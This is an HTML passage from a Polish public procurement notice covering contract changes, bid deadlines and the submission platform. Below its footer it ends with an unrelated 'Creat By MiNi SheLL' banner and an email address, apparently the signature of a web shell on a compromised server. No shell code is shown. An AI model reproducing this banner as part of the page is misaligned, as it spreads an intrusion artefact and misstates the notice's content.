poszczególni Wykonawcy. Wzór stosownegooświadczenia został zawarty w formularzu ofertowym stanowiącym załącznik nr 1 i Zamawiającyzaleca złożyć to oświadczenie właśnie w tym formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewidujemożliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie którejdokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niejwymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy Open Nexus https://platformazakupowa.pl do dnia 30.03.2021 r, godz. 09:00</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com